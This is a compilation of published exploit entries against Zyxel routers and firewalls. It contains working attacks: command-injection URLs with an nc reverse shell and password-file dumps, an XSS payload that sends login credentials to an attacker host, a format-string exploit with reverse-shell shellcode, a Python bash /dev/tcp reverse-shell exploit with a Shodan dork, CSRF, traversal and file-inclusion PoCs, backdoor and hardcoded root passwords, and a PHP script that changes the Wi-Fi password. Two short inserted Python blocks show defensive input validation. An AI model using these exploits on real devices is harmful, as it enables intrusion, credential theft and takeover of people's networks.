
# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
# Date: 2017-04-02
# Exploit Author: Fluffy Huffy (trevor Hough)
# Vendor Homepage: www.zyxel.com
# Version: EMG2926 - V1.00(AAQT.4)b8
# Tested on: linux
# CVE : CVE-2017-6884

An OS command injection vulnerability was discovered in a commonly used
home router (Zyxel EMG2926, firmware V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools,
specifically the nslookup function. A malicious user may exploit numerous
vectors to execute arbitrary commands on the router.

Exploit (Reverse Shell)
https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p

Exploit (Dump Password File)
Request
GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1
Host: 192.168.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup
Accept-Language: en-US,en;q=0.8
Cookie: csd=9; sysauth=<Clipped>
Connection: close

Response (Clipped)
<textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash
admin:$1$<Clipped>:0:0:admin:/:/bin/fail
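As an added defensive example (not part of the advisory above, and not Zyxel's code), here is the vulnerable pattern beside a hardened diagnostic handler: the target is validated as a hostname or IP address and passed to nslookup as an argument vector, never through a shell. The sample targets and function names are constructed for illustration.

```python
import ipaddress
import re
import subprocess

# Constructed sample targets shaped like the PoC above: a benign name and
# one carrying a shell command separator.
BENIGN_TARGET = "google.ca"
INJECTED_TARGET = "google.ca; cat /etc/passwd"

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 63 chars per label.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def vulnerable_command_line(target: str) -> str:
    """The pattern behind the advisory: the request parameter is spliced into
    a command line that a shell later interprets, so ';', '|', '`' and '$('
    in the value become new commands."""
    return f"nslookup {target}"


def is_valid_target(target: str) -> bool:
    """Accept only a syntactically valid IP address or hostname."""
    if not target or len(target) > 253:
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(target) is not None


def build_argv(target: str) -> list:
    """Hardened form: validate, then build an argument vector. Executed
    without a shell, the value is a single argv entry whatever it contains."""
    if not is_valid_target(target):
        raise ValueError(f"rejected diagnostic target: {target!r}")
    return ["nslookup", target]


def run_nslookup(target: str, timeout: float = 5.0) -> str:
    """Run the validated lookup; no shell=True, so no metacharacter handling."""
    completed = subprocess.run(
        build_argv(target), capture_output=True, text=True, timeout=timeout, check=False
    )
    return completed.stdout


if __name__ == "__main__":
    print("vulnerable:", vulnerable_command_line(INJECTED_TARGET))
    for candidate in (BENIGN_TARGET, INJECTED_TARGET):
        try:
            print("hardened:", build_argv(candidate))
        except ValueError as exc:
            print("hardened:", exc)
```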
            
# Exploit Title: Reflected XSS on Zyxel login pages
# Date: 10 Apr 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://www.zyxel.com/us/en/
# Version: V4.31
# Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi
# CVE : 2019-9955

1. Description
==============

Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the
mp_idx parameter on weblogin.cgi and webauth_relogin.cgi.

2. Proof of Concept
===================

Host a malicious JavaScript file named 'z', or any other single character,
locally.  The contents of 'z' for the following example are:


-----
$("button").click(function() {
    $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname});
});
-----


Close the mp_idx string with "; and use the getScript functionality of jQuery
to include the malicious file:

Request:

GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



Response:

HTTP/1.1 200 OK
Date: Wed, 10 Apr 2019 23:13:39 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 7957

<!DOCTYPE html>
<html>
<head>
	<title>Welcome</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta charset="utf-8">
	<meta http-equiv="pragma" content="no-cache">
    <link href="/ext-js/mobile/css/jquery.mobile-1.4.2.min.css?v=180711001117" rel="stylesheet" type="text/css">
    <link href="/ext-js/mobile/css/style.css?v=180711001117" rel="stylesheet" type="text/css">
    <link href="/ext-js/mobile/css/theme.css?v=180711001117" rel="stylesheet" type="text/css">
	<link rel="stylesheet" type="text/css" href="/logo/mobile_custmiz_page.css?v=180711001117" /> 
	<script src="/ext-js/mobile/js/jquery-1.8.2.min.js?v=180711001117" type="text/javascript"></script>
    <script src="/ext-js/mobile/js/jquery.mobile-1.4.2.min.js?v=180711001117" type="text/javascript"></script>
	<script type="text/javascript" src="/lang/language_panel.js?v=180711001117"></script>
<script language="JavaScript">
	var errorNum = 0;
	var mp_idx = "";$.getScript('//$LHOST/z');//";
...


When the login form is submitted, the host for the malicious file gets a request
containing the login credentials and target system:

$LHOST - - [10/Apr/2019 23:04:41] "GET /z?_=1554937481076 HTTP/1.1" 200 -
$LHOST - - [10/Apr/2019 23:04:49] "GET /?username=test&password=test&host=$RHOST HTTP/1.1" 200 -
            
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387

GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
            
#!/usr/bin/expect -f

#
# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# "We live on a placid island of ignorance in the midst of black seas of
# infinity, and it was not meant that we should voyage far."
#                                -- H. P. Lovecraft, The Call of Cthulhu
#
# "Multiple improper input validation flaws were identified in some CLI
# commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71,
# USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware
# versions 4.32 through 5.21, VPN series firmware versions 4.30 through
# 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500
# firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware
# version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version
# 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2)
# and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and
# earlier versions, that could allow a local authenticated attacker to
# cause a buffer overflow or a system crash via a crafted payload."
#                                -- CVE-2022-26531
#
# The zysh binary is a restricted shell that implements the command-line
# interface (CLI) on multiple Zyxel products. This proof-of-concept exploit
# demonstrates how to leverage the format string bugs I have identified in
# the "extension" argument of some zysh commands, to execute arbitrary code
# and escape the restricted shell environment.
#
# - This exploit targets the "ping" zysh command.
# - It overwrites the .got entry of fork() with the shellcode address.
# - The shellcode address is calculated based on a leaked stack address.
# - Hardcoded offsets and values might need some tweaking, see comments.
# - Automation/weaponization for other targets is left as an exercise.
#
# For additional details on my bug hunting journey and on the
# vulnerabilities themselves, you can refer to the official advisory:
# https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt
#
# Usage:
# raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password
# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
# 
# Leaked stack address:  0x7fe97170
# Shellcode address:     0x7fe9de40
# Base string length:    46
# Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn
# 
# *** enjoy your shell! ***
# 
# sh-5.1$ uname -snrmp
# Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0
# sh-5.1$ id
# uid=10007(admin) gid=10000(operator) groups=10000(operator)
#
# Tested on:
# Zyxel USG20-VPN with Firmware 5.10 
# [other appliances/versions are also likely vulnerable]
#

# change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8
encoding system iso8859-1

# hostile format string to leak stack address via direct parameter access
set offset1 77
set leak [format "AAAA.0x%%%d\$x" $offset1]

# offsets to reach addresses in retloc sled via direct parameter access
set offset2 1801
set offset3 [expr $offset2 + 1]

# difference between leaked stack address and shellcode address
set diff 27856

# retloc sled
# $ mips64-linux-readelf -a zysh | grep JUMP | grep fork
# 112dd558  0000967f R_MIPS_JUMP_SLOT  00000000   fork@GLIBC_2.0
# ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2]
set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024]

# nop sled
# nop-equivalent instruction: xor $t0, $t0, $t0
set nops [string repeat "\x01\x8c\x60\x26" 64]

# shellcode
# https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c
set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c"

# padding to align payload in memory (might need adjusting)
set padding "AAA"

# print header
send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n"
send_user "Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n"

# check command line
if { [llength $argv] != 3} {
	send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n"
	exit 1
}

# get SSH connection parameters
set port "22"
set host [lindex $argv 0]
set user [lindex $argv 1]
set pass [lindex $argv 2]

# inject payload via the TERM environment variable
set env(TERM) $retloc$nops$sc$padding

# connect to target via SSH
log_user 0
spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user
expect {
	-nocase "password*" {
		send "$pass\r"
	}
	default {
		send_error "error: could not connect to ssh\n"
		exit 1
	}
}

# leak stack address
expect {
	"Router? $" {
		send "ping 127.0.0.1 extension $leak\r"
	}
	default {
		send_error "error: could not access zysh prompt\n"
		exit 1
	}
}
expect {
	-re "ping: unknown host AAAA\.(0x.*)\r\n" {
	}
	default {
		send_error "error: could not leak stack address\n"
		exit 1
	}
}
set leaked $expect_out(1,string)
send_user "Leaked stack address:\t$leaked\n"

# calculate shellcode address
set retval [expr $leaked + $diff]
set retval [format 0x%x $retval]
send_user "Shellcode address:\t$retval\n"

# extract each byte of shellcode address
set b1 [expr ($retval & 0xff000000) >> 24]
set b2 [expr ($retval & 0x00ff0000) >> 16]
set b3 [expr ($retval & 0x0000ff00) >> 8]
set b4 [expr ($retval & 0x000000ff)]
set b1 [format 0x%x $b1]
set b2 [format 0x%x $b2]
set b3 [format 0x%x $b3]
set b4 [format 0x%x $b4]

# calculate numeric arguments for the hostile format string
set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3  "]
send_user "Base string length:\t$base\n"
set n1 [expr ($b4 - $base) % 0x100]
set n2 [expr ($b2 - $b4) % 0x100]
set n3 [expr ($b1 - $b2) % 0x100]
set n4 [expr ($b3 - $b1) % 0x100]

# check for dangerous numeric arguments below 10
if {$n1 < 10} { incr n1 0x100 }
if {$n2 < 10} { incr n2 0x100 }
if {$n3 < 10} { incr n3 0x100 }
if {$n4 < 10} { incr n4 0x100 }

# craft the hostile format string
set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4]
send_user "Hostile format string:\t$exploit\n\n"

# uncomment to debug
# interact +

# exploit target
set prompt "(#|\\\$) $"
expect {
	"Router? $" {
		send "ping 127.0.0.1 extension $exploit\r"
	}
	default {
		send_error "error: could not access zysh prompt\n"
		exit 1
	}
}
expect {
	"Router? $" {
		send_error "error: could not exploit target\n"
		exit 1
	}
	-re $prompt {
		send_user "*** enjoy your shell! ***\n"
		send "\r"
		interact
	}
	default {
		send_error "error: could not exploit target\n"
		exit 1
	}
}
            
# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
# Version: Zyxel VMG3312-B10B
# Tested on : Parrot Os
# Author: Yusuf Furkan
# Twitter: h1_yusuf
# CVE: CVE-2019-7391
# model name: DSL-491HNU-B1B v2

<html>
  <!-- CSRF PoC - generated by Yusuf -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/login/login-page.cgi" method="POST">
      <input type="hidden" name="AuthName" value="admin" />
      <input type="hidden" name="AuthPassword" value="1234" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
# Date: 2018-10-28
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Firmware: 1.00(AAPP.0)D7 
# Tested on: windows
# Fixed firmware: 1.00(AAPP.7)


<?php 
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor 

$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files

if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
	$open = file($local_file);
	foreach($open as $u_p){
		$bomb = explode(" ",$u_p);
		$user = $bomb[0];
		$pass = base64_decode($bomb[1]);
		if(!empty($pass)){
			echo "{$user}:{$pass}<br>";
		}else {
			continue;
		}
	}
}else {
	echo "pfff";
}
ftp_close($ftp_conn); 
?>
            
# Exploit Title: ZyXEL VMG3312-B10B - Cross-Site Scripting
# Date: 2018-08-21
# Exploit Author: Samet ŞAHİN
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Version: ZyXEL VMG3312-B10B
# Tested on: Mozilla Firefox 61.0.2 & Google Chrome 67.0.3396.99
# Category: Stored XSS
# CVE : N/A

Malicious POST REQUEST :
POST /pages/connectionStatus/connectionStatus-hostEntry.cmd HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/index.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Cookie: SESSION=529313605
Connection: close
Upgrade-Insecure-Requests: 1
action=edit&oldip=192.168.1.36&hosttype=&sessionKey=1997367832&hostname=X<svg onload=alert()>

Vulnerable PAGE :
/pages/connectionStatus/connectionStatus-hostEntry.cmd

Vulnerable PARAMETER :
hostname

Cross Site Scripting PAYLOAD :
X<svg onload=alert()>

#Samet ŞAHİN
            
# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
# Date: 2018-11-17
# Exploit Author: numan türle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0

# PoC
@modem_gateway = "192.168.1.1" // default address

http://@modem_gateway/../../../../../../../../../../../../etc/passwd

Here are the contents:

############################## contents ##############################
nobody:x:99:99:nobody:/nonexistent:/bin/false
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh
            
# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525


from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse


parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")

args = parser.parse_args()

banner = (
    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
    "biA6KSApCg=="
)


def main():

    print("\n" + base64.b64decode(banner).decode("utf-8"))

    if None in vars(args).values():
        print(f"[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()

    if "http" not in args.url:
        args.url = "https://" + args.url
    args.url += "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)


def exploit(url, host, port):
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }

    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")

    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:

        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)

        except:
            print("[!] Enjoy your shell !!!")


if __name__ == "__main__":
    main()
            
# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]
# Discovered by: Karn Ganeshen
# CERT VU# 870744
# Vendor Homepage: [www.zyxel.com]
# Version Reported: [Firmware version V100AANC0b5]
# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]


*Vulnerability Details*

CWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input
Validation - CVE-2015-6018

The diagnostic ping function's PingIPAddr parameter in the ZyXEL
PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user
input. An attacker can execute arbitrary commands as root.

*OS Command Injection PoC*

The underlying services run as 'root'. The injection therefore allows dumping
system password hashes.

*HTTP Request*

POST /diagnostic/diagnostic_general.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>/diagnostic/diagnostic_general.cgi
Cookie: session=a457f8ad83ba22dc256cd0b002c66666
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12062103314079176991367286444
Content-Length: 451

-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="InfoDisplay"

-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="PingIPAddr"

8.8.8.8; cat /etc/shadow 
-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="Submit"

Ping
....

*HTTP Response*
.....
<snipped>
<br class="clearfloat" />
<!-- configuration beginning -->
<div class="headline"><span class="cTitle">General</span></div> <table
width="90%" border="0" align="center" cellpadding="0" cellspacing="0"
class="cfgpadding">
<tr>
<td nowrap="nowrap"><textarea name="InfoDisplay" rows="15" cols="100"
readonly="readonly">

root:<hash>:15986:0:99999:7:::
lp:*:13013:0:99999:7:::
nobody:*:13013:0:99999:7:::
admin:<hash>:16035:0:99999:7:::
user:<hash>:16035:0:99999:7:::
</textarea></td>
</tr>
</table>
<table width="90%" border="0" align="center" cellpadding="0"
cellspacing="0" class="cfgpadding">
<tr>
-----------------------------12062103314079176991367286444--
            
# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.
# Google Dork: n/a
# Date: 2017-10-31
# Exploit Author: Matthew Sheimo
# Vendor Homepage: https://www.zyxel.com/
# Software Link: n/a
# Version: PK5001Z 2.6.20.19
# Tested on: Linux
# About: The ZyXEL PK5001Z modem is used by CenturyLink, a global communications and IT services company focused on connecting its customers to the power of the digital world. 
# Linked CVE's: CVE-2016-10401
 
 
The ZyXEL PK5001Z modem has a hardcoded password; log in with the following credentials via Telnet:
 
username: admin
password: CenturyL1nk
 
Escalate to root with 'su' and this password.

password: zyad5001


[root:/]# telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

PK5001Z login: admin
Password: CenturyL1nk
$ whoami
admin_404A03Tel
$ su
Password: zyad5001
# whoami
root
# uname -a
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
# cat /etc/zyfwinfo
Vendor Name:                      ZyXEL Communications Corp.



            
# Exploit Title: Zyxel P-660HW-61 < 3.40(PE.11)C0 - Local File Inclusion
# Date: 2-05-2017
# Exploit Author: ReverseBrain
# Contact: https://www.twitter.com/ReverseBrain
# Vendor Homepage: https://www.zyxel.com
# Software Link: ftp://ftp.zyxel.com/P-660HW-61/firmware/P-660HW-61_3.40(PE.11)C0.zip
# Version: 3.40(PE.11)C0

1. Description

Any user who can log in to the router can exploit the Local File Inclusion
to read files stored on the device.

2. Proof of Concept

Log in to the router and pass the path of the file you want to read as the
getpage parameter. For example:

http://ROUTER_IP/cgi-bin/webcm?getpage=/etc/passwd
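As an added example for the VMG1312 '../' traversal above and this getpage file inclusion (not part of either advisory, and not Zyxel's code): a path-resolution check that rejects requests escaping the document root, plus an allowlisted replacement for a getpage-style parameter. The document root, page names and request paths are assumed values.

```python
import os
import posixpath
from typing import Optional
from urllib.parse import unquote

WEBROOT = "/var/www"          # assumed document root of the embedded HTTP server
# Constructed allowlist for a 'getpage=<name>' dispatcher: clients pick a key,
# never a filesystem path.
ALLOWED_PAGES = {"status.html", "wlan.html", "diag.html"}


def traversal_depth(requested: str) -> int:
    """Count '..' segments after one round of percent-decoding; useful for
    alerting on requests like the PoC above even when the server rejects them."""
    return unquote(requested).split("/").count("..")


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Map a request path onto the document root. Returns the normalized
    absolute path, or None if the request escapes the root (via '..',
    percent-encoded dots, an embedded NUL, or a symlink)."""
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    # Lexical check passed; also follow symlinks so a link inside the root
    # cannot point outside it (realpath of a missing path is just the path).
    real_root = os.path.realpath(root)
    real_candidate = os.path.realpath(candidate)
    if real_candidate != real_root and not real_candidate.startswith(real_root + "/"):
        return None
    return candidate


def serve_getpage(getpage: str) -> Optional[str]:
    """Hardened handler for a P-660HW-style 'getpage' parameter: the value
    must be one of the allowlisted page names, so '/etc/passwd' never reaches
    the filesystem."""
    name = unquote(getpage)
    if name not in ALLOWED_PAGES:
        return None
    return resolve_under_root(WEBROOT, name)


if __name__ == "__main__":
    for req in ("/pages/status.html", "/../../../../../../etc/passwd", "/%2e%2e/%2e%2e/etc/passwd"):
        print(req, "->", resolve_under_root(WEBROOT, req), "| traversal depth", traversal_depth(req))
    print("getpage=/etc/passwd ->", serve_getpage("/etc/passwd"))
    print("getpage=status.html ->", serve_getpage("status.html"))
```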
            
<?php
/*
Exploit Title   : ZYXEL remote configuration editor / Web Server DoS
Date            : 23 April 2015
Exploit Author  : Koorosh Ghorbani
Site            : http://8thbit.net/
Vendor Homepage : http://www.zyxel.com/
Platform        : Hardware 
Tested On       : ZyXEL P-660HN-T1H_IPv6
Firmware Version: 1.02(VLU.0)
--------------------------
 Unattended remote access  
--------------------------
ZYXEL embedded software does not check cookies and credentials on the POST method, so
attackers could change settings and view pages using POST requests.

--------------------------
      DoS Web Server
--------------------------
Sending an empty POST to admin pages will crash the internal web server, and the router then needs
a hard reset.

*/
$banner = "   ___ _______ _     ____  _ _______ \r\n" . "  / _ \__   __| |   |  _ \(_)__   __|\r\n" ." | (_) | | |  | |__ | |_) |_   | |   \r\n" ."  > _ <  | |  | '_ \|  _ <| |  | |   \r\n" ." | (_) | | |  | | | | |_) | |  | |   \r\n" ."  \___/  |_|  |_| |_|____/|_|  |_|   \r\n" ."                                     \r\n" ."                                     \r\n";
print $banner;
function Post($packet,$host)
{
	try {
		$curl = curl_init();
		curl_setopt($curl, CURLOPT_URL, $host);
		curl_setopt($curl, CURLOPT_POST, 1);
		curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
		curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
		// $host is the full target URL here; CURLOPT_REFERER takes a bare URL, not a "Referer: " header line
		curl_setopt($curl, CURLOPT_REFERER, $host);
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
		$result = curl_exec($curl);
		curl_close($curl);
		return $result;
	}catch (Exception $e ){
		echo $e->getMessage();
		return "" ;
	}
}
if(sizeof($argv) < 3) {
	print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
    exit(1);
}
$host = $argv[1];
$password = urlencode($argv[2]);
$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ;
$target = "http://$host/cgi-bin/WLAN_General.asp";
